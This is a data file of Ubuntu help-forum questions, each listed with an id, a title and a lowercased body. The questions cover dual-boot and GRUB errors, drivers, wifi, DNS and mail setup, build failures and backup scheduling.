412868	dual hdd , win7 & ubuntu	i have a pc that has windows 7 on it , and a hard drive that i recently installed and put ubuntu 12.04 lts on . the problem i encounter is that grub does not load windows 7 , and gives me an error when i try to load from grub . instead i have to go to the bios and select the other hdd in order to get to windows 7 . ideally i would like to be able to use grub to decide which hdd to boot . however , even another boot-loader that allows me to select which hdd to boot would be nice .
412872	rolling release in ubuntu	has canonical decided to use a rolling release style in ubuntu 14.04 ? will the normal 6 months release and 2 year updates continue ?
412875	brother mfc7360n printing blank pages	i followed the instructions shown here . however , when i send a job to the printer it just prints plank pages . my configuration from cups is displayed in this image : i am running ubuntu 13.10 64bit . update it seems to be working after a reboot , and a reset of the printer .
412878	ubuntu touch tablet msi primo 91	can you install ubuntu touch in a tablet msi primo 91 .
412880	accidentally removed terminal prompt	i tried to remove my old version of python on my linux laptop with the terminal but accidentally removed the terminal app . how to get it back ?
412881	i can not find disk utility tool	how come i can not find disk-utility tool on ( 1 ) dash search ( 2 ) system setting ? . i already finish to upgrade my system to newest version . can you help me to find it ? . my ubuntu system is : ubuntu 12.04 lts .
412882	unmount gvfs samba share with open file	i have a samba share mounted . i 'm trying to unmount it on the commandline . $ gvfs-mount -u smb : //server/root/ error unmounting mount : filesystem is busy i ran lsof to find open files , but i ca n't figure out what pid i need to kill . it does n't say smb : //server/root/my-open-file . how do i find out which pid to kill ?
412892	time depedencies between ubuntu distros	i have two versions of ubuntu 12.04 and ubuntu 13.04 in my system . now if i set the time according to my timezone in ubuntu 13.04 , the time in ubuntu 12.04 changes to 5 hours ahead of the original timing . if i set the right time in ubuntu 12.04 , time in ubuntu 13.04 goes 5 hours backward . how do i clear this dependecy ?
412895	error message on windows vista boot after ubuntu 12.04 install	i added a slave drive to my desktop and installed ubuntu 12.04 to it using usb stick . windows vista is on the master drive . before installing ubuntu 12.04 i disconnected the master hard drive to avoid any mistakes . but after installing ubuntu on the slave drive and reconnecting the master drive i get this long error message : error : no such device : 42b5645e-9e24-4551-bdfe-259699182345 grub rescue > windows vista only boots when i boot to the slave drive .
412897	creating hadoop cluster in ubuntu using laptop and desktop	i am learning hadoop . i want to install hadoop in such a way that my laptop and desktop are in a cluster . i do have connectivity between them using ssh .
412900	unable to open/install 12.04 after downloading	i am unable to find a program to open/install ubuntu 12.04 . ( extention .iso )
412901	dns/mail confusion `` no mx or a records ''	i 'm attempting to send mail from a remote email account to my postfix smtp mail service on my local network . everything works fine on the local network and users can freely exchange mail between one another 's local accounts . however , i ca n't send email to the outside , nor receive from the outside . when i send email to the remote server , my log says , `` no route to host '' . when i send email from the remote server , i get a bounce message that says , `` no mx or a records found '' . i 've been assured this is a dns problem and not a postfix problem , so i 'll rephrase this question in terms of dns . here 's the confusion : i 've created a zone file for my domain that is recognized only by my localhost dns server . when i query the dns server of my isp , i get a nxdomain error . granted that only my loopback dns can recognize the zone file , how does this file get known to the public network ? how is this related to the domain i 've registered with a public registrar ? and how is my remote email account ever going to figure out that i do have mx and a records for that domain , though only on my local dns ? btw my network is behind a nat and i 've forwarded 53 through both firewalls , and it 's currently open . here are the current zone files : db.admitonetwowire.com $ ttl 1d @ in soa ns1.admitonetwowire.com . root.admitonetwowire.com . ( 3 604800 86400 2419200 604800 ) @ in ns ns1.admitonetwowire.com . root in a 65.13.145.203 ns1 in a 65.13.145.203 server in a 65.13.145.203 @ in a 65.13.145.203 @ in mx 0 server.admitonetwowire.com . db.203.145.13.65 $ ttl 1d @ in soa ns1.admitonetwowire.com . root.admitonetwowire.com . ( 3 604800 86400 2419200 604800 ) @ in ptr ns1.admitonetwowire.com @ in ptr server.admitonetwowire.com @ in ptr root.admitonetwowire.com @ in ptr admitonetwowire.com . @ in ns ns1.admitonetwowire.com . btw 65.13.145.203 is my public ip .
412902	sudo add-apt-repository ppa : lubuntu-desktop/ppa shows `` 404 not found ''	is there a replacement repository for the following two lubuntu ppa 's : sudo add-apt-repository ppa : lubuntu-desktop/ppa sudo add-apt-repository ppa : lubuntu-desktop i receive a 404 not found on both does the repository not exist any longer ?
412905	`` failed to open \efi\microsoft\boot\grub64.efi '' , etc	a while ago , my primary hdd failed , taking my efi partition with it . however , my ubuntu system files are kept on my secondary ssd . when i got a new hdd , i created an efi partition using gparted on a live cd , and then ran boot repair . now , whenever i boot , i get this error , which displays for about a half second before the ubuntu splash screen appears : failed to open \efi\microsoft\boot\grub64.efi - 8000000000000000e failed to load image failed to open \efi\microsoft\boot\grub64.efi - 8000000000000000e failed to load image could not open `` \efi\boot\fallback.efi '' : 14 failed to open \efi\boot\grub64.efi - 8000000000000000e failed to load image failed to open \efi\boot\mokmanager.efi - 8000000000000000e failed to load image the system continues to boot normally after it appears . i checked , and the listed files are indeed missing from /boot/efi . i 've already tried running boot repair again , as well as update-grub . what can i do to resolve this error ?
412907	how to boot from my windows installation disk ?	here 's a reddit thread detailing my problem a bit more . i can provide more information if needed . hi ! i 've installed ubuntu as my os because i needed a working os to get a new windows disk . i 've already referred to this thread for help , but i get stuck on the actually installing windows part ; my computer skips over booting from my windows cd while it can boot from my ubuntu live cd just fine . any ideas ? any help would be greatly appreciated !
412909	how to install a wacom intuous pen small model ctl-480 on ubuntu 12.04 ts pc is acer aspire z5101 all in one	pc is acer aspire z5101 all in one , could you please give instructions on how to install a tablet .
412910	running turboc++ in dosemu	my question is how to run borland turbo c++ version 3 in dosemu . i know dosbox works , but i am not able to copy the output produced in the program . i tried installing turco ++ in dosemu by navigating to d drive . i sucessfully reached the installation screen , but it showed an error . `` problem detected in d : \tc\bin\unzip.exe. , c ) ontinue or a ) bort ? '' . please help me to copy the o/p from the console window . i use tc coz my school asks me to , i am not a big fan of out dated software either . i dont want to use windows 98 or some thing for this purpose .
412912	openstack : keystone service stops immediately after starting	when restarting the keystone service , it starts with a pid but within a fraction of second it stops . checking the status immediately afterwards , it shows a different pid and when rechecking afterwards , it 's dead . root @ hyper5 : ~ # service keystone restart stop : unknown instance : keystone start/running , process 37746 root @ hyper5 : ~ # service keystone status keystone start/running , process 37750 root @ hyper5 : ~ # service keystone status keystone stop/waiting
412913	why ca n't i install opendkim-2.9.0 on my vps ?	this is the output i get : -checking for a bsd-compatible install ... /usr/bin/install -c -checking whether build environment is sane ... yes -checking for a thread-safe mkdir -p ... /bin/mkdir -p -checking for gawk ... gawk -checking whether make sets $ ( make ) ... yes -checking whether make supports nested variables ... yes -checking for gcc ... gcc -checking whether the c compiler works ... yes -checking for c compiler default output file name ... a.out -checking for suffix of executables ... -checking whether we are cross compiling ... no -checking for suffix of object files ... o -checking whether we are using the gnu c compiler ... yes -checking whether gcc accepts -g ... yes -checking for gcc option to accept iso c89 ... none needed -checking for style of include used by make ... gnu -checking dependency style of gcc ... gcc3 -checking for gcc option to accept iso c99 ... -std=gnu99 -checking whether gcc -std=gnu99 and cc understand -c and -o together ... yes -checking build system type ... x86_64-unknown-linux-gnu -checking host system type ... x86_64-unknown-linux-gnu -checking how to print strings ... printf -checking for a sed that does not truncate output ... /bin/sed -checking for grep that handles long lines and -e ... /bin/grep -checking for egrep ... /bin/grep -e -checking for fgrep ... /bin/grep -f -checking for ld used by gcc -std=gnu99 ... /usr/bin/ld -checking if the linker ( /usr/bin/ld ) is gnu ld ... yes -checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b -checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm -checking whether ln -s works ... yes -checking the maximum length of command line arguments ... 1966080 -checking whether the shell understands some xsi constructs ... yes -checking whether the shell understands `` += '' ... yes -checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop -checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop -checking for /usr/bin/ld option to reload object files ... -r -checking for objdump ... objdump -checking how to recognize dependent libraries ... pass_all -checking for dlltool ... no -checking how to associate runtime and link libraries ... printf % s\n -checking for ar ... ar -checking for archiver @ file support ... @ -checking for strip ... strip -checking for ranlib ... ranlib -checking command to parse /usr/bin/nm -b output from gcc -std=gnu99 object ... ok -checking for sysroot ... no -checking for mt ... mt -checking if mt is a manifest tool ... no -checking how to run the c preprocessor ... gcc -std=gnu99 -e -checking for ansi c header files ... yes -checking for sys/types.h ... yes -checking for sys/stat.h ... yes -checking for stdlib.h ... yes -checking for string.h ... yes -checking for memory.h ... yes -checking for strings.h ... yes -checking for inttypes.h ... yes -checking for stdint.h ... yes -checking for unistd.h ... yes -checking for dlfcn.h ... yes -checking for objdir ... .libs -checking if gcc -std=gnu99 supports -fno-rtti -fno-exceptions ... no -checking for gcc -std=gnu99 option to produce pic ... -fpic -dpic -checking if gcc -std=gnu99 pic flag -fpic -dpic works ... yes -checking if gcc -std=gnu99 static flag -static works ... yes -checking if gcc -std=gnu99 supports -c -o file.o ... yes -checking if gcc -std=gnu99 supports -c -o file.o ... ( cached ) yes -checking whether the gcc -std=gnu99 linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes -checking whether -lc should be explicitly linked in ... no -checking dynamic linker characteristics ... gnu/linux ld.so -checking how to hardcode library paths into programs ... immediate -checking whether stripping libraries is possible ... yes -checking if libtool supports shared libraries ... yes -checking whether to build shared libraries ... yes -checking whether to build static libraries ... yes -checking for pkg-config ... no -checking for the pthreads library -lpthreads ... no -checking whether pthreads work without any flags ... no -checking whether pthreads work with -kthread ... no -checking whether pthreads work with -kthread ... no -checking for the pthreads library -llthread ... no -checking whether pthreads work with -pthread ... yes -checking for joinable pthread attribute ... pthread_create_joinable -checking if more special flags are required for pthreads ... no -checking for library containing inet_addr ... none required -checking for library containing dlopen ... -ldl -checking for library containing socket ... none required -checking for library containing inet_aton ... none required -checking for library containing inet_pton ... none required -checking for library containing inet_ntop ... none required -checking for library containing getaddrinfo ... none required -checking for library containing res_ninit ... no -checking for library containing res_sertservers ... no -checking for library containing getopt_long ... none required -checking for sys/types.h ... ( cached ) yes -checking for netinet/in.h ... yes -checking for arpa/nameser.h ... yes -checking for netdb.h ... yes -checking for resolv.h ... yes -checking for useconds_t ... yes -checking whether the resolver works without -lresolv ... no -checking whether the resolver works with -lresolv ... yes -checking arpa/inet.h usability ... yes -checking arpa/inet.h presence ... yes -checking for arpa/inet.h ... yes -checking fcntl.h usability ... yes -checking fcntl.h presence ... yes -checking for fcntl.h ... yes -checking limits.h usability ... yes -checking limits.h presence ... yes -checking for limits.h ... yes -checking iso/limits_iso.h usability ... no -checking iso/limits_iso.h presence ... no -checking for iso/limits_iso.h ... no -checking for netdb.h ... ( cached ) yes -checking for netinet/in.h ... ( cached ) yes -checking paths.h usability ... yes -checking paths.h presence ... yes -checking for paths.h ... yes -checking for stdlib.h ... ( cached ) yes -checking for string.h ... ( cached ) yes -checking sys/file.h usability ... yes -checking sys/file.h presence ... yes -checking for sys/file.h ... yes -checking sys/param.h usability ... yes -checking sys/param.h presence ... yes -checking for sys/param.h ... yes -checking sys/socket.h usability ... yes -checking sys/socket.h presence ... yes -checking for sys/socket.h ... yes -checking sys/time.h usability ... yes -checking sys/time.h presence ... yes -checking for sys/time.h ... yes -checking syslog.h usability ... yes -checking syslog.h presence ... yes -checking for syslog.h ... yes -checking for unistd.h ... ( cached ) yes -checking for stdint.h ... ( cached ) yes -checking for stdbool.h that conforms to c99 ... yes -checking for _bool ... yes -checking for uid_t in sys/types.h ... yes -checking for mode_t ... yes -checking for off_t ... yes -checking for pid_t ... yes -checking for size_t ... yes -checking for ssize_t ... yes -checking for uint16_t ... yes -checking for uint32_t ... yes -checking for uint64_t ... yes -checking vfork.h usability ... no -checking vfork.h presence ... no -checking for vfork.h ... no -checking for fork ... yes -checking for vfork ... yes -checking for working fork ... yes -checking for working vfork ... ( cached ) yes -checking type of array argument to getgroups ... gid_t -checking for getgroups ... yes -checking for working getgroups ... yes -checking for stdlib.h ... ( cached ) yes -checking for gnu libc compatible malloc ... yes -checking whether time.h and sys/time.h may both be included ... yes -checking for sys/time.h ... ( cached ) yes -checking for unistd.h ... ( cached ) yes -checking for alarm ... yes -checking for working mktime ... yes -checking for stdlib.h ... ( cached ) yes -checking for gnu libc compatible realloc ... yes -checking for dup2 ... yes -checking for endpwent ... yes -checking for getcwd ... yes -checking for gethostname ... yes -checking for gethostbyname ... yes -checking for getaddrinfo ... yes -checking for gethostbyname2 ... yes -checking for gettimeofday ... yes -checking for isascii ... yes -checking for memchr ... yes -checking for memmove ... yes -checking for memset ... yes -checking for regcomp ... yes -checking for select ... yes -checking for socket ... yes -checking for strcasecmp ... yes -checking for strchr ... yes -checking for strdup ... yes -checking for strerror ... yes -checking for strncasecmp ... yes -checking for strrchr ... yes -checking for strstr ... yes -checking for strtol ... yes -checking for strtoul ... yes -checking for strtoull ... yes -checking for realpath ... yes -checking for strsep ... yes -checking bsd/string.h usability ... no -checking bsd/string.h presence ... no -checking for bsd/string.h ... no -checking for strlcat ... no -checking for library containing strlcat ... no -checking for library containing strlcpy ... no -checking for strlcpy ... no -checking for library containing strlcat ... ( cached ) no -checking for library containing strlcpy ... ( cached ) no -checking strl.h usability ... no -checking strl.h presence ... no -checking for strl.h ... no -checking for strl.h in /usr/local/include/strl ... checking for strl.h in /usr/include/strl ... no -checking for struct sockaddr_un.sun_len ... no -checking for struct sockaddr_in.sin_len ... no -checking for struct sockaddr_in6.sin6_len ... no -checking for rrdtool ... no -checking for sendmail ... /usr/sbin/sendmail -checking for openssl includes ... no -checking for openssl library and includes ... /usr/pkg -checking for milter library and includesâś configure : error : milter not found
412915	how much ram can i install in my compaq a900 computer ?	i would love to know how much usable ram i can install in this compaq a900 computer . no idea how to tell , just started using ubuntu this week . intel® pentium ( r ) dual cpu t2370 @ 1.73ghz × 2 intel® 965gm chipset 64-bit ubuntu 13.10 2.9 gib
412917	how to increase waiting time for non responding programs ?	i have installed a ubuntu gnome and found that i am getting lots of program is not responding messages . i have either to `` force quit '' the program or `` wait '' for it a little more . i 've noticed that each time i wait for the program , the program eventually continues without issues . so , i think there might be a `` timeout '' configuration for programs to be considered non-responding and i want to increase this timeout .
412918	really messed up my mbr	pretty sure i 've messed my mbr up . may not be the case , i 'll give the evidence and let you decide . i was attempting to setup a dual boot system . i have : 60 gb ssd with windows 7 on it 2 tb raid to go along with it 1 tb hdd that linux was installed on . my old boot summary can be found here : http : //paste.ubuntu.com/6841705/ my new canbe found here : http : //paste.ubuntu.com/6841777 i 'm new to this . i 'm just trying to get setup for classes . currently the ssd ( win 7 ) is the first boot hdd from my bios . i 've tried changing this to sda as that is what the boot repair recommended doing . linux wo n't bootup if i do that . i 'll redo whatever i have too , i 'm basically out of ideas . i 'm looking to get windows and ubuntu in a dual boot config , with linux on the 1tb drive , with windows on the ssd .
412922	connecting two sound cards mic a to speaker b and mic b to speaker a	i have been digging around looking for a good way under linux to connect up to sound cards that are alsa devices . sound card a has a mic and speaker and sound card b has a mic and speaker . i want to connect sound card a mic to sound card b speaker and sound card b mic to sound card a speaker . a mic -- > b speaker a speaker < -- b mic i have a specific need for this specific connection . i have looked into alsa plugins and asoundrc , i 'm not clear on how i would configure alsa to do such a configuration . i see lots of referencse to pulseaudio and it 's ability to mix and match . i prefer something like pulse as i will want to send the mic/spkr over a network to a spkr/mic . thanks in advance for the help . craig
412934	workaround for playing wav files	in ubuntu 13.04 and 13.10 by default when you click on a .wav file , ubuntu opens the totem video app and plays the .wav file completely garbled . this is a known bug that has been outstanding for quite a while . what is a good work around ? i 'm thinking of a lightweight player to play the .wav files without fuss and which can be set as the default for .wav files . if there is a simple way to make totem work that would probably be even better . i get voicemails as .wav files and am looking for an easy solution for playing them .
412936	another wifi dropping thread !	i am using ubuntu 13.10 on the new intel nuc i3 with the intel centrino advanced-n 6235 wireless adapter . it 's a fresh install and i only added xbmc for linux to it . my problem is that the wifi connection keeps dropping every 10mins or so , and when it does , my wifi network disappears from the avaiable wifi networks list and there is no way to connect back to it . the only way to make the network available again , is to completely delete the network and then add it again from scratch , entering the password and everything . the other way is to reboot . other than that the network is just not detected at all by the system . once i am reconnected , it will work for another 10mins before it drops again , and so on . this is my home wifi network , and i have several other devices connected to the wifi without any issues . i read some other posts where they said to do sudo apt-get update..and also disabling ipv6 and setting mtu to 1500 , i tried that but it did n't fix the issue . i would really appreciate if i can get some trouble shooting assistance with this issue . i am quite new to linux so i 'd appreciate a detailed walk thru . thanks a lot in advance and looking forward to get to the bottom of this .
412937	when i am cloning in to website it shows error	git clone http : //sample.com/bag name here i mentioned web address as sample.com/bag for reference . i also tried with ssh : //sample.com/bag name i also tried with ssh : //git @ sample.com/bag name when i entered password for git @ sample.com/bag name : it shows permission denied , please try again password for git @ sample.com/bag name : it shows permission denied , please try again password for git @ sample.com/bag name : it shows ( public key , password ) fatal : the remote end hung up unexpectedly
412941	âfailure to download extra data filesâ pop-up after installing/uninstalling ttf-mscorefonts-installer	i had to install wine for some purpose , and with wine , it 's dependency ttf-mscorefonts-installer had to be installed . while installing wine through synaptic , in first attempt , ttf-mscorefonts-installer did not install.so i reselected ttf-mscorefonts-installer and installed it.synaptic showed and successful installation . yet , a pop-up window came up as below . if i select run this action now , a terminal and authenticate window comes up.after authentication terminal closes.after sometime the window will pop up again.if i select close , the window will pop up again later . this question is nearly same as this question . the only difference is that i use ubuntu 12.10 . the above mentioned question has three solutions , answer 1 , answer 2 , answer 3 . i have mentioned ahead why these answers do n't work for me . answer 1 : - the answer suggests installing ttf-mscorefonts-installer through a specific method.i installed ttf-mscorefonts-installer but the window still comes up . answer 2 : - this solution did not work.the window still pops up . answer 3 : - this one also did not work . edit : - maybe i could just delete the file that is responsible for the pop up ? does anyone know which file it is ? edit2 : - after some googling , i have found the bug bug # 991767.devlopers do have a look at it . i have reinstalled update-notifier , but it did n't work.after reading the file at /usr/share/update-notifier/package -- data-downloads-failed. , i have found that it uses a variable $ packages to show software.maybe the bug can be temporarily fixed by deleting the contents of the variable.does anyone know where update-notifier reads this variable from ?
412942	sending and reading http request through socket for usb connected ethernet device	i 'm writing a simple c program to send a http request to a usb modem device , which is loaded ( cdc_ether ) and has the 192.168.0.144 ip address with ethx interface up on a ubuntu machine . i am able to send request successfully but i 'm not able to read the data . since the device is controlled with http requests for control management . here is my code . # define buffsize 512 # define maxbuf 512 int serversocket ; int i , n = 0 ; size_t bwritten , btotal ; struct sockaddr_in serveraddr ; struct hostent *hostptr ; const int optval = 1 ; const socklen_t optlen = sizeof ( optval ) ; char buffer [ buffsize ] ; //i need to send //192.168.0.1/goform/goform_set_cmd_process ? goformid=connect_network char *set_cmd_post= '' /goform/goform_set_cmd_process '' ; char *host= '' 192.168.0.1 '' ; char *agent= '' rndis_socket '' ; char sendline [ buffsize + 1 ] = { 0 } ; char recvline [ buffsize + 1 ] = { 0 } ; char *post_str_connect= '' goformid=connect_network\r\n '' ; int main ( int argc , const char * argv [ ] ) { int j=0 ; memset ( & serveraddr , 0 , sizeof ( serveraddr ) ) ; serveraddr.sin_family = af_inet ; serveraddr.sin_port = htons ( 80 ) ; serveraddr.sin_addr.s_addr = inet_addr ( `` 192.168.0.144 '' ) ; //serveraddr.sin_addr.s_addr=htonl ( inaddr_any ) ; snprintf ( sendline , maxbuf , `` post % s http/1.0\r\n '' // post or get , both tested and works . both http 1.0 http 1.1 works , but sometimes `` user-agent : % s\r\n '' `` host : % s\r\n '' // but sometimes http 1.0 works better in localhost type `` accept : */*\r\n '' `` content-length : % d\r\n\r\n '' `` content-type : application/x-www-form-urlencoded\r\n '' `` connection : close\r\n '' `` % s '' , set_cmd_post , agent , host , ( unsigned int ) strlen ( post_str_connect ) , post_str_connect ) ; serversocket = socket ( af_inet , sock_stream , 0 ) ; //serversocket = socket ( pf_inet , sock_stream , ipproto_tcp ) ; if ( serversocket < 0 ) error ( `` socket ( ) '' ) ; char *opt ; opt = `` eth3 '' ; setsockopt ( serversocket , sol_socket , so_bindtodevice , opt , 4 ) ; int rtn = setsockopt ( serversocket , sol_socket , so_reuseaddr , ( void* ) & optval , optlen ) ; if ( bind ( serversocket , ( struct sockaddr* ) & serveraddr , sizeof ( serveraddr ) ) < 0 ) error ( `` bind ( ) '' ) ; if ( connect ( serversocket , ( struct sockaddr * ) & serveraddr , sizeof ( serveraddr ) ) < 0 ) error ( `` connect ( ) '' ) ; printf ( `` connect to server success \n '' ) ; n=send ( serversocket , sendline , strlen ( sendline ) ,0 ) ; if ( n > =0 ) { printf ( `` write success % d % d\n '' , n , ( int ) strlen ( sendline ) ) ; do { n = recv ( serversocket , recvline , sizeof ( recvline ) , 0 ) ; if ( n > 0 ) { recvline [ n ] = '\0 ' ; printf ( `` % s '' , recvline ) ; } } while ( n > 0 ) ; } }
412947	problem , to open .deb package ?	i am using u13.04 & having problem with libre office.thus , i 've decided to give a try on free office . i 've downloaded the .deb file .i 'm trying to install it by clicking the package but a folder pops up , given below : how can i install free office . any help is appreciated !
412949	what program and what write speed ?	what program is best to use for burning ubuntu 12.04.3 lts desktop and what write speed is the best to burn it i use the program imageburn is good ?
412952	unable to listen sound in my ubuntu system	i have installed ubuntu 12 on my system . i have inbuilt speaker in my lcd monitor . everything is working fine but i am unable to listen sound when i play music or any video file . i can see video on youtube but there is no sound . have i done any mistake during installation or should i turn on any driver ? please advise ...
412957	intalled ubuntu alongside win 8.1 and it goes only to ubuntu	i installed ubuntu 12.04lts without turning off fast startup in windows 8.1 as i was unaware that this needed to be done . i 've installed ubuntu many times before , but this was my first time with windows 8.1 , and unfortunately i did n't look up anything before i did it . i resized the partition and installed ubuntu successfully and upon reboot , it went directly to ubuntu without grub showing up . is there anything i can do as the windows partition is my primary one and there is software that i need access to on it .
412958	hdiutil : command not found	i want to convert a .iso file to a .img file . so i write : hdiutil convert -format udrw -o ~/home/antu/target.img ~/home/antu/ubuntu.iso in a terminal window . it shows that : hdiutil : command not found so please help me ?
412960	are there others methods to uninstall linux on mac ?	so i am trying to delete my ubuntu linux partition on my macbook because i dont want it there anymore . yes , i know i can do it using my live usb/cd but i am tired of trying to do that because my computer is not reading it well . i 've done it before . i do n't know why it is not working now . i explained it all here i want to uninstall ubuntu but my mac reads my live usb as if it was the linux partition not the installer ? that is the link to my previous question for trying to make my live usb readable as a installer . anyways.. my question now is , are there other alternatives to deleting that partition ? is there anything i can do on mac 's terminal to delete it for example ? i am a noob though . so using terminal will be a good lesson if there is a way .
412961	ubuntu system update will fix errors ?	i have ubuntu 13.04 64bit installed on my machine , and all the problems began when i tried to update my mysql workbench from terminal , now not any browser installed can understand my keyboard layout , i can type only in english , and the system keyboard shortcuts are no longer works , and many more . my question is : if i 'll update my system to the next one , these errors will be corrected automatically ? or i need to do a fresh install ?
412978	5.1 laptop audio and ubuntu !	i have a laptop with a 5.1 audio set . when i used windows ( which i can no longer afford ) i was successfully using the realtek drivers that the oem ( acer ) provided . with ubuntu this is no longer the case ( 5.1 is not working properly ) there is an hd realtek driver designed for linux on their site ( realtek ) . how do i install it , and , should i ?
412979	speed of ubuntu within window	just a quick question about performance within windows of ubuntu . after getting hold of a fairly old laptop , to test my websites created on a mac , and being subjected to endless pause and freezes i decided to load ubuntu . this is now my first week using it and i am very happy so far , following the forum here and using terminal i have solved most of the niggles , wifi connection etc . and feel i can use this as a netbook . now i would like to keep windows on the laptop , and i installed ubuntu within windows using the exe download , so does this significantly slow ubuntu down ? should i scratch everything and make a partition ? or for day-to-day mild usuage is it ok as it is ? there are no documents , files , photos , music or videos on the machine , its was simply there to test websites , but now with ubuntu to surf the net and check emails . lastly , if i choose to keep the status quo , is it possible to have ubuntu as the defualt boot up , because right now , if i turn on the machine and walk away it will load in windows - i have to sit and wait and then select ubuntu and hit return . actually that was not a quick question . many thanks hvr
412981	cant boot from windows 8 after installing ubuntu 13.04	i installed ubuntu 13.04 as a dual boot on my samsung series 5 ( np353u4c ) which came with windows 8 pre-installed . the problem is that i ca n't boot from windows 8 ( loader ) any longer , it just give me an error . i 'm new to linux and i really need help to get the two working together urgently please .
412982	where can i download xubuntu released wallpapers ?	i know that xubuntu has released the community wallpaper contest winners ; where can i download them ?
412984	how to use the wine file	i have downloaded wine application wine application from wine hq website . i have the file in .tar format i have downloaded it from an windows 7 installed os computer . i have saved and extracted the wine file from my ubuntu 12.04 . the file is stored on this path `` d : \alladin\ubuntu\wine\wine-1.7.11 '' ( without doulbe quotes ) now that i have extracted . what all code should i type to compile the wine appllication and make the program . note : the path mentioned above is the path given from windows 7 pc and the path has 22 items including the files called `` make.vars.in '' and `` makefile.in '' thankyou .
412986	unknown filesystem grub error after unistalling ubuntu partition from windows 8	i have a really big problem . i deleted ubuntu partitions from windows 8 and now on startup of my other pc ( im using my old one now to contact you ) it shows this error : unknown filesystem : grub rescue > tried some commands from other threads but it shows me again the same error . i think that ubuntu has been completely uninstalled , but this grub rescue pops me out . i can not boot in my pc anywhere ! either in windows . the only thing i can do is write commands in grub rescue , or enter bios windows menu ... : (
412988	how to make evince open last document on startup ?	is there any way to make evince 3.10 automatically load last opened document on startup ?
412990	gnome network manager add button disabled for 802.1x security after update	i recently performed an update , and it will no longer let me add profiles to network manager that use 802.1x security . i have ensured all the fields have been filled out correctly .
412995	how to enable `notify-osd` for vlc ?	i want to enable my desktop notification ( notify-osd ) of vlc.. look the pic below . how to ?
412999	installing ubuntu 13.10 alongside windows 7	i have windows 7 home premium x86 , i burned the .iso image on a dvd after i had downloaded it . i restarted my computer , and i booted from the dvd . when i click on `` installing ubuntu '' , first it detects that i have windows 8 instead of windows 7 . after completing the installation and restarting my computer , it does n't show me dual boot with windows 7 and ubuntu 13.10 , but the computer boots normally to windows 7 . thanks . edit : i currently dual-booting windows xp and windows 7 home premium .
413002	problem enabling ubuntu software center	after trying to install acroread and chromium 64 bit , the ubuntu 12.04.03 software center was disabled , please help me to enable it . the following packages have unmet dependencies : acroread-bin : i386 : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed google-chrome-stable : i386 : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libudev1 ( > = 198 ) but it is not installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is installed depends : libxcomposite1 ( > = 1:0.3-1 ) but 1:0.4.3-2build1 is installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is installed depends : libxi6 ( > = 2:1.2.99.4 ) but 2:1.7.1.901-1ubuntu1~precise1 is installed libxml2 : depends : liblzma5 ( > = 5.1.1alpha+20120614 ) but 5.1.1alpha+20110809-3 is installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed
413005	how to add custom tree in nautilus ?	i was wondering if it is possible to add a custom tree to the sidebar in tree view . the default for me is two trees with home and file system . i would like to have one for specific folders that i use frequently or for some network drives . i am aware of the crtl + d shortcut to add a bookmark , but this seems to only work in places view . i*m on 12.04 . thanks , mat
413008	ca n't download steam	when i try to download steam from the software center , i 'm asked to put in a password to authorize it . i put my password in then i get `` to change software repository settings , you need to authenticate '' so i put my password in again and i get `` to update software catalogue , you need to authenticate . then it says it is installing but it never does . i 've tried : sudo apt-get update sudo apt-get upgrade
413014	keyboard problem	i have an lg r400 laptop and i just updated my os to ubuntu 13.10 , but i cant use my keyboard since i started installing the new os so i had to use the on board keyboard to complete the installation . after the installation was done , the on board keyboard appeared automatically . i have tried to change the keyboard input method system , but nothing worked out . any idea on how to solve this ? ps : if i plug a keyboard using a usb port it works just fine .
413015	how to install ubuntu 12.04 on android 4.1 tablet ?	how can i install and run ubuntu 12.04 lts on an android tablet ? i had ubuntu installed on my laptop but its chip crashed . i want to buy a tablet and install ubuntu 12.04 on it .
413019	`` fatal error : / boost/tupple/tupple.hpp : no such file or directory '' while trying to install revkit	error screen in file included from /home/sushanttrivedi/documents/revkit-1.3/dependencies/build/fmi-0.3/fmi/vars.cpp:1:0 : /home/sushanttrivedi/documents/revkit-1.3/dependencies/build/fmi-0.3/fmi/vars.hpp:27:33 : fatal error : boost/tuple/tuple.hpp : no such file or directory
413020	ca n't wake from usb lan device with wol	i attach a sitecom usb 3.0 gigabit ethernet to a asrock b75 pro3-m , which is used as a nas running ubuntu 13.10 ( 64 bit ) . i installed the driver from the sitecom site and ran these handy scripts to enable usb wake : http : //bernaerts.dyndns.org/linux/74-ubuntu/220-ubuntu-resume-usb-hid ( i blindly assume the script is working properly ) . using ethtool , i verified that the usb adapter has wakeon `` g '' enabled . in the grub file , i adapted following , because initially the pc would not go into suspend ( immediate resume from suspend ) : grub_cmdline_linux_default= '' quiet splash usbcore.autosuspend=-1 acpi_enforce_resources=lax '' i set netdown = no in /etc/init.d/halt . when entering suspend , the power of the usb gigabit interface stays on ( power led remains on ) and i can see the network activity led blinking , indicating that the interface is still receiving packets . good news ! yet ... no resume from suspend is happening . checking cat /proc/acpi/wakeup , i do see that no usb device is set to wake ( despite the script above ) . echoing usbx to /proc/acpi/wakeup does n't render the device to be enabled neither ( it remains disabled in the list /proc/acpi/wakeup ) . what can i do ? many thanks in advance !
413026	reliable backup mechanism for ubuntu	i need a backup mechanism for ubuntu that meets two conditions : is executed at given points in time ( cron - like ) verifies completion of each backup task ( task did n't crash ) , otherwise - relaunches backup task ! ( upstart -like ) on one hand , upstart seemed like a good candidate because it promises that the script will re-run if it fails , but it 's not meant to trigger events on date-basis . i 've implemented a quick-and-dirty working solution with upstart , but it 's very `` patchy '' and not very modular and `` clean '' . on the other hand , cron seems very fitting for routine backups , but i could n't find a way to make it verify tasks are actually completed properly . it 's also possible i 've overlooked some possibility to make this work under cron .
